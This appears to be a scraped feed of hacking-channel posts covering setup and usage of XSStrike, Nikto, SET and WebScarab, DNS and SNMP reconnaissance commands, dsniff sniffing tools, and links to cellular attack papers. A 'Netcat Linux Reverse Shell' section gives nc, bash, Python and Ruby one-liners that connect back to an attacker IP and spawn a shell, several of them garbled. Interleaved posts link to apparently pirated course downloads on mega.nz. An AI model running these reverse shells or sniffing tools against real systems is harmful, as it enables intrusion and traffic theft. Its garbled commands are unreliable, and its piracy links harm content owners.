▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Most advanced XSS scanner 8k stars :

FEATURES :

Reflected and DOM XSS scanning
Multi-threaded crawling
Context analysis
Configurable core
WAF detection & evasion
Outdated JS lib scanning
Intelligent payload generator
Handmade HTML & JavaScript parser
Powerful fuzzing engine
Blind XSS support
Highly researched work-flow
Complete HTTP support
Bruteforce payloads from a file
Powered by Photon, Zetanize and Arjun
Payload Encoding

🦑Os :

> debians (kali-parrot-ubuntu...)

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/s0md3v/XSStrike

2️⃣cd XSStrike

2️⃣python xsstrike.py [-h] [-u TARGET] [--data DATA] [-t THREADS] [--seeds SEEDS] [--json] [--path]
[--fuzzer] [--update] [--timeout] [--params] [--crawl] [--blind]
[--skip-dom] [--headers] [--proxy] [-d DELAY] [-e ENCODING]


MORE USAGES :

4️⃣Scan a single URL
Option: -u or --url

5️⃣Test a single webpage which uses GET method.

python xsstrike.py -u "http://example.com/search.php?q=query"

6️⃣Supplying POST data
python xsstrike.py -u "http://example.com/search.php" --data "q=query"

7️⃣Testing URL path components
Option: --path

8️⃣Want to inject payloads in the URL path like http://example.com/search/<payload>, you can do that with --path switch.

python xsstrike.py -u "http://example.com/search/form/query" --path

9️⃣Treat POST data as JSON
Option: --json

This switch can be used to test JSON data via POST method.

python xsstrike.py -u "http://example.com/search.php" --data '{"q":"query"} --json'

🔟Crawling
Option: --crawl

For more type -h
✅
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Review and Manage the SAP MRP List -244 MB

https://www.linkedin.com/learning/review-and-manage-the-sap-mrp-list

https://mega.nz/#F!vs9D3K5R!9Lg6-Qf5hb-7-T-Oe-j01Q

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#5G Cellular Attacks

- [ENISA THREAT LANDSCAPE FOR 5G NETWORKS](https://github.com/W00t3k/Awesome-CellularHacking/blob/master/ENISA%20threat%20landscape%20for%205G%20Networks.pdf)

- [Protecting the 4G and 5G Cellular PagingProtocols against Security and Privacy Attacks](https://www.degruyter.com/downloadpdf/j/popets.2020.2020.issue-1/popets-2020-0008/popets-2020-0008.pdf)

- [Insecure Connection Bootstrapping in Cellular Networks: The Root of All Evil](https://relentless-warrior.github.io/wp-content/uploads/2019/05/wisec19-preprint.pdf)

- [5GReasoner: A Property-Directed Security and Privacy Analysis Framework for 5G Cellular Network Protocol](https://relentless-warrior.github.io/wp-content/uploads/2019/10/5GReasoner.pdf)

- [QCSniper - A tool For capture 2g-4g air traffic using qualcomm phones ](https://labs.p1sec.com/2019/07/09/presenting-qcsuper-a-tool-for-capturing-your-2g-3g-4g-air-traffic-on-qualcomm-based-phones/)

- [Privacy Attacks to the 4G and 5G Cellular Paging Protocols Using Side Channel Information](http://homepage.divms.uiowa.edu/~comarhaider/publications/LTE-torpedo-NDSS19.pdf)

- [New Privacy Threat on 3G, 4G, and Upcoming 5G AKA Protocols ](https://arxiv.org/pdf/1905.07617.pdf)

- [New Vulnerabilities in 5G Networks](https://threatpost.com/5g-security-flaw-mitm-targeted-attacks/147073/)

- [Side Channel Analysis in 4G and 5G Cellular Networks](https://i.blackhat.com/eu-19/Thursday/eu-19-Hussain-Side-Channel-Attacks-In-4G-And-5G-Cellular-Networks.pdf)

- [5G NR Jamming, Spoofing, and Sniffing](https://github.com/W00t3k/Awesome-Cellular-Hacking/blob/master/5gjam.pdf)

> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#DNS Reconnassaince :

1️⃣DNSRECON
* [dnsrecon](https://github.com/darkoperator/dnsrecon) - DNS Enumeration Script created by Carlos Perez (darkoperator)

2️⃣Reverse lookup for IP range:
./dnsrecon.rb -t rvs -i 10.1.1.1,10.1.1.50

3️⃣Retrieve standard DNS records:
./dnsrecon.rb -t std -d example.com

4️⃣Enumerate subdornains:
./dnsrecon.rb -t brt -d example.com -w hosts.txt

5️⃣DNS zone transfer:
./dnsrecon -d example.com -t axfr


6️⃣Parsing NMAP Reverse DNS Lookup

> nmap -R -sL -Pn -dns-servers dns svr ip range | awk '{if( ($1" "$2" "$3)=="NMAP scan report")print$5" "$6}' | sed 's/(//g' | sed 's/)//g' dns.txt

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Netcat Linux Reverse Shell :

1️⃣nc 10.10.10.10 888 -e /bin/sh
10.10.10.10 is the IP address of the machine you want the victim to connect to.
888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).

2️⃣ Netcat Linux Reverse Shell
nc 10.10.10.10 888 -e cmd.exe
10.10.10.10 is the IP address of the machine you want the victim to connect to.
888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).

3️⃣ Using Bash
bash -i & /dev/tcp/10.10.10.10/888 0 &1

4️⃣ Using Python
python -c 'import socket, subprocess, os; s=socket. socket (socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.10.10.10",888)); os.dup2(s.fileno(),0); os.dup2(s.fileno(l,1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'

5️⃣ Using Ruby
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",888).to_i; exec sprintf("/bin/sh -i &%d &%d 2 &%d",f,f,f)'

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Build your first Microservices application using Go and gRPC (Golang) —1.36 GB—

https://www.udemy.com/course/microservices-go-grpc/

https://mega.nz/folder/tMJSgALb#ud27D8Fy-uYWgCPLdX69PA

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

#Useful SNMP Commands

1️⃣Search for Windows installed software
smpwalk !grep hrSWinstalledName

2️⃣ Search for Windows users
snmpwalk ip 1.3 lgrep --.1.2.25 -f4

3️⃣ Search for Windows running services
snrnpwalk -c public -v1 ip 1 lgrep hrSWRJnName !cut -d" " -f4

4️⃣ Search for Windows open TCP ports
smpwalk lgrep tcpConnState !cut -d" " -f6 !sort -u


> git sources
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 updated web server scanner :

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :


1️⃣git clone https://github.com/sullo/nikto
# Main script is in program/

2️⃣cd nikto/program
# Run using the shebang interpreter

3️⃣./nikto.pl -h http://www.example.com
# Run using perl (if you forget to chmod)

4️⃣perl nikto.pl -h http://www.example.com

🦑Run as a Docker container:

1️⃣git clone https://github.com/sullo/nikto.git

2️⃣cd nikto

3️⃣docker build -t sullo/nikto .
# Call it without arguments to display the full help

4️⃣docker run --rm sullo/nikto
# Basic usage

5️⃣docker run --rm sullo/nikto -h http://www.example.com
# To save the report in a specific format, mount /tmp as a volume:

6️⃣docker run --rm -v $(pwd):/tmp sullo/nikto -h http://www.example.com -o /tmp/out.json

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

important hackers terms :

1️⃣arpspoof
redirect packets from a target host (or all hosts) on the LAN
intended for another local host by forging ARP replies. this
is an extremely effective way of sniffing traffic on a switch.
kernel IP forwarding (or a userland program which accomplishes
the same, e.g. fragroute 😄must be turned on ahead of time.

2️⃣dnsspoof
forge replies to arbitrary DNS address / pointer queries on
the LAN. this is useful in bypassing hostname-based access
controls, or in implementing a variety of man-in-the-middle
attacks (HTTP, HTTPS, SSH, Kerberos, etc).

3️⃣dsniff
password sniffer. handles FTP, Telnet, SMTP, HTTP, POP,
poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP
MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ,
Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec
pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL,Net, Sybase
and Microsoft SQL auth info.

4️⃣ dsniff automatically detects and minimally parses each
application protocol, only saving the interesting bits, and
uses Berkeley DB as its output file format, only logging
unique authentication attempts. full TCP/IP reassembly is
provided by libnids(3) (likewise for the following tools as
well).

5️⃣filesnarf
saves selected files sniffed from NFS traffic in the current
working directory.

6️⃣macof
flood the local network with random MAC addresses (causing
some switches to fail open in repeating mode, facilitating
sniffing). a straight C port of the original Perl Net::RawIP
macof program.

7️⃣mailsnarf
a fast and easy way to violate the Electronic Communications
Privacy Act of 1986 (18 USC 2701-2711), be careful. outputs
selected messages sniffed from SMTP and POP traffic in Berkeley
mbox format, suitable for offline browsing with your favorite
mail reader (mail -f, pine, etc.).

8️⃣msgsnarf
record selected messages from sniffed AOL Instant Messenger,
ICQ 2000, IRC, and Yahoo! Messenger chat sessions.

9️⃣sshmitm
SSH monkey-in-the-middle. proxies and sniffs SSH traffic
redirected by dnsspoof(8), capturing SSH password logins, and
optionally hijacking interactive sessions. only SSH protocol
version 1 is (or ever will be) supported - this program is far
too evil already.

🔟sshow
SSH traffic analysis tool. analyzes encrypted SSH-1 and SSH-2
traffic, identifying authentication attempts, the lengths of
passwords entered in interactive sessions, and command line
lengths.

1️⃣1️⃣tcpkill
kills specified in-progress TCP connections (useful for
libnids-based applications which require a full TCP 3-whs for
TCB creation).

1️⃣2️⃣tcpnice
slow down specified TCP connections via "active" traffic
shaping. forges tiny TCP window advertisements, and optionally

ICMP source quench replies.

1️⃣3️⃣urlsnarf
output selected URLs sniffed from HTTP traffic in CLF
(Common Log Format, used by almost all web servers), suitable
for offline post-processing with your favorite web log
analysis tool (analog, wwwstat, etc.).

1️⃣4️⃣webmitm
HTTP / HTTPS monkey-in-the-middle. transparently proxies and
sniffs web traffic redirected by dnsspoof(8), capturing most
"secure" SSL-encrypted webmail logins and form submissions.

1️⃣5️⃣webspy
sends URLs sniffed from a client to your local Netscape
browser for display, updated in real-time (as the target
surfs, your browser surfs along with them, automagically).
a fun party trick.

> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Social-Engineer Toolkit 2020 updated :

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/trustedsec/social-engineer-

2️⃣toolkit/ setoolkit/

3️⃣cd setoolkit

4️⃣pip3 install -r requirements.txt

5️⃣python setup.py

🦑OS :

> Linux
>Mac OS X (experimental)

6️⃣Full usage see this pdf-if you beginer :
> https://github.com/trustedsec/social-engineer-toolkit/raw/master/readme/User_Manual.pdf


@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A Java based HTTP/HTTPS proxy

> for assessing web application vulnerability.

>It supports editing/viewing HTTP messages on-the-fly. Other featuers include spiders, client certificate, proxy-chaining, intelligent scanning for XSS and SQL injections etc.

 for Windows-Linux-Mac :

> https://sourceforge.net/projects/paros/files/latest/download

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What this ☠️ project can do in hacking ?

> Download :

https://wiki.owasp.org/index.php/Category:OWASP_WebScarab_Project

FEATURES :

>Fragments - extracts Scripts and HTML comments from HTML pages as they are seen via the proxy, or other plugins

>Proxy - observes traffic between the browser and the web server. The WebScarab proxy is able to observe both HTTP and encrypted HTTPS traffic, by negotiating an SSL connection between WebScarab and the browser instead of simply connecting the browser to the server and allowing an encrypted stream to pass through it. Various proxy plugins have also been developed to allow the operator to control the requests and responses that pass through the proxy.

> Manual intercept - allows the user to modify HTTP and HTTPS requests and responses on the fly, before they reach the server or browser.

>Beanshell - allows for the execution of arbitrarily complex operations on requests and responses. Anything that can be expressed in Java can be executed.

>Reveal hidden fields - sometimes it is easier to modify a hidden field in the page itself, rather than intercepting the request after it has been sent. This plugin simply changes all hidden fields found in HTML pages to text fields, making them visible, and editable.
Bandwidth simulator - allows the user to emulate a slower network, in order to observe how their website would perform when accessed over, say, a modem.

>Spider - identifies new URLs on the target site, and fetches them on command.

>Manual request - Allows editing and replay of previous requests, or creation of entirely new requests.
SessionID analysis - collects and analyzes a number of cookies to visually determine the degree of randomness and unpredictability. Note that this analysis is rather trivial, and does not do any serious checks, such as FIPS, etc.

>Scripted - operators can use BeanShell (or any other BSF supported language found on the classpath) to write a script to create requests and fetch them from the server. The script can then perform some analysis on the responses, with all the power of the WebScarab Request and Response object model to simplify things.

>Parameter fuzzer - performs automated substitution of parameter values that are likely to expose incomplete parameter validation, leading to vulnerabilities like Cross Site Scripting (XSS) and SQL Injection.

>Search - allows the user to craft arbitrary BeanShell expressions to identify conversations that should be shown in the list.
Compare - calculates the edit distance between the response bodies of the conversations observed, and a selected baseline conversation. The edit distance is "the number of edits required to transform one document into another". For performance reasons, edits are calculated using word tokens, rather than byte by byte.

>SOAP - There is a plugin that parses WSDL, and presents the various functions and the required parameters, allowing them to be edited before being sent to the server. NOTE: This plugin is deprecated, and may be removed in the future. SOAPUI is streets beyond anything that Webscarab can do, or will ever do, and is

>Extensions - automates checks for files that were mistakenly left in web server's root directory (e.g. .bak, ~, etc). Checks are performed for both, files and directories (e.g. /app/login.jsp will be checked for /app/login.jsp.bak, /app/login.jsp~, /app.zip, /app.tar.gz, etc). Extensions for files and directories can be edited by user.

>XSS/CRLF - passive analysis plugin that searches for user-controlled data in HTTP response headers and body to identify potential CRLF injection (HTTP response splitting) and reflected cross-site scripting (XSS) vulnerabilities.

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Process Visualization with HMI / SCADA (PLC III) —4.03 GB—

https://www.udemy.com/course/hmi-scada/

https://mega.nz/folder/faZFEIpa#fakaZBlX0KfHPG0fKQgilQ

not all verified

Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Vulnerable Servers :

> There are a series of vulnerable web applications that you can use to practice your skills in a safe environment. You can get more information about them in the [vulnerable_servers directory in this repository](https://github.com/The-Art-of-Hacking/art-of-hacking/tree/master/vulnerable_servers).

#How to Integrate OWASP ZAP with Jenkins :

-You can integrate ZAP with Jenkins and even automatically create Jira issues based on your findings. You can download the [ZAP plug in here](https://wiki.jenkins.io/display/JENKINS/zap+plugin).

-[This video](https://www.youtube.com/watch?v=mmHZLSffCUg) provides an overview of how to integrate


#Docker Security

- [OWASP Docker security resources](https://github.com/OWASP/Docker-Security)

- [Docker Bench for Security](https://github.com/docker/docker-bench-security)

- [Dockerscan](https://github.com/cr0hn/dockerscan)

- [Docker Security Playground](https://github.com/giper45/DockerSecurityPlayground)

#Javascript Tools :

* [Retire.js](https://retirejs.github.io/retire.js)

>git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Working with Android Tools and Testing [
—-657—

https://www.pluralsight.com/courses/android-tools-testing

https://mega.nz/#F!ptxVQRzZ!N4jRKcMHP9_ScG5l9vE3uQ